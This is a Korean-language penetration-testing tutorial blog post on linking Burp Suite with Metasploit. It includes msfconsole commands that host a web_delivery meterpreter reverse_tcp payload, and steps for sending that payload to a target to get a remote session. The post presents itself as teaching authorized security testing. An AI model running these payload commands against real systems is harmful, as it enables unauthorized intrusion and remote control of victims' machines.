Burp Suite · 2026-03-23

Burp와 Metasploit 연동으로 익스플로잇 워크플로 통합

Burp와 Metasploit 연동을 통해 웹 익스플로잇 흐름을 하나로 묶는 방법과 설정, 실제 워크플로 예시 및 주의사항을 초보자 관점에서 정리한 자료

작성일 : 2026-03-23 ㆍ 작성자 : 관리자
post
목차

개요

Burp와 Metasploit 연동은 수동 웹 분석과 자동 익스플로잇 실행을 유기적으로 연결한다. Burp는 HTTP/HTTPS 트래픽 가시성 및 변조에 강하고, Metasploit은 익스플로잇 모듈과 페이로드 관리에 특화되어 있다. 이 글은 두 도구를 함께 사용해 익스플로잇 워크플로를 통합하는 흐름과 실전에서 자주 쓰는 방법을 알기 쉽게 설명한다.

왜 연동이 필요한가

단일 도구로는 요청 변조, 페이로드 생성, 세션 핸들링을 모두 효율적으로 처리하기 어렵다. Burp에서 세밀히 요청을 조작하고, Metasploit에서 생성한 페이로드를 브라우저 또는 타깃에 전달하면 반복 작업을 줄이고 정확도를 높일 수 있다. 특히 브라우저 기반 익스플로잇 과정에서 Burp의 인터셉트 기능과 Repeater가 유용하다.

사전 준비

  • Burp Suite 설치 및 프록시 리스너 기본 설정(기본 127.0.0.1:8080)
  • Metasploit(msfconsole) 설치
  • 테스트 대상과 공격자 머신 네트워크 연결성 확인
  • 법적 허가가 있는 테스트 범위

연동 전략 개요

주요 전략은 두 가지다. 첫째, 브라우저 트래픽을 Burp로 경유시켜 페이로드 전달을 관찰·수정하고, Metasploit가 제공하는 웹 호스팅(예: web_delivery)을 이용해 페이로드를 배포한다. 둘째, Metasploit의 HTTP/HTTPS 출력이나 모듈이 외부로 나가는 트래픽을 Burp 프록시로 경유하게 하여 요청을 가로채고 검사한다.

방법 A: 웹 페이로드 호스팅 + Burp 인터셉트

가장 직관적인 방식이다. Metasploit에서 web_delivery 같은 모듈로 페이로드를 호스팅하고, 브라우저를 Burp 프록시로 설정해 요청을 가로채면서 전달 과정을 확인하거나 수정한다. 과정은 아래와 같다.

  • Metasploit에서 web_delivery 설정
  • 브라우저를 Burp로 프록시 설정
  • 브라우저로 페이로드 URL 접속 후 Burp에서 요청 변조 및 전달
use exploit/multi/script/web_delivery
set SRVHOST 0.0.0.0
set SRVPORT 8080
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.2.15
exploit -j

위처럼 실행하면 http://<공격자IP>:8080/ 에 페이로드가 호스팅된다. 브라우저를 통해 해당 URL에 접근하면 Burp가 요청을 가로채고 필요 시 페이로드를 수정해 전달할 수 있다.

방법 B: Metasploit 트래픽을 Burp로 라우팅

Metasploit 자체가 HTTP 프록시 환경변수를 인식하므로 http_proxy, https_proxy를 설정하면 모듈의 외부 호출이 Burp를 거치게 된다. 이 방식은 모듈의 원격 호출을 검사하거나 중간자 환경에서 동작을 확인할 때 유용하다.

export http_proxy=http://127.0.0.1:8080
export https_proxy=http://127.0.0.1:8080
msfconsole

설정 후 해당 환경을 사용하는 모듈을 실행하면 Burp에서 요청과 응답을 볼 수 있다. 다만 모든 모듈이 환경변수를 동일하게 쓰지는 않으므로 모듈 문서를 확인해야 한다.

실제 워크플로 예제

간단한 예제로 web_delivery를 통해 PowerShell 명령을 브라우저로 전달하고 Burp로 검사하는 흐름을 소개한다.

  • 1) Metasploit에서 web_delivery 실행 (위 코드 참고)
  • 2) 브라우저의 프록시를 Burp로 설정
  • 3) 브라우저에서 제공된 URL 접속 후 Burp가 인터셉트한 요청을 Repeater로 보내 수정
  • 4) 수정된 요청을 전달해 타깃에서 페이로드 실행 및 세션 확보

주의사항과 안전 수칙

  • 항상 테스트 대상에 대한 명시적 허가를 확보한다.
  • 프록시를 통한 트래픽 변조가 로그에 남을 수 있으므로 증거 보존 및 보고에 유의한다.
  • 네트워크 구성과 방화벽 규칙으로 인해 리스너가 도달하지 못할 수 있으므로 사전 검증이 필요하다.
  • 환경변수 방식은 모든 모듈에서 동작하지 않을 수 있어 테스트가 필요하다.

마무리

Burp 익스플로잇 통합은 수동 분석의 정밀함과 Metasploit의 자동화 능력을 결합해 효율적인 침투테스트 워크플로를 제공한다. 기본 흐름을 이해하고 안전 수칙을 지키면 도구 간 연계로 반복 작업을 줄이고 더 신뢰성 높은 결과를 얻을 수 있다. 처음에는 단순한 web_delivery 시나리오로 시작해 점차 모듈과 프록시 설정을 확장하는 방식을 권장한다.

Burp Metasploit 연동 Burp 익스플로잇 통합 Burp 보안 테스트 도구 연계 Burp Suite Metasploit 연동 익스플로잇 워크플로 웹 취약점 검사 침투테스트 워크플로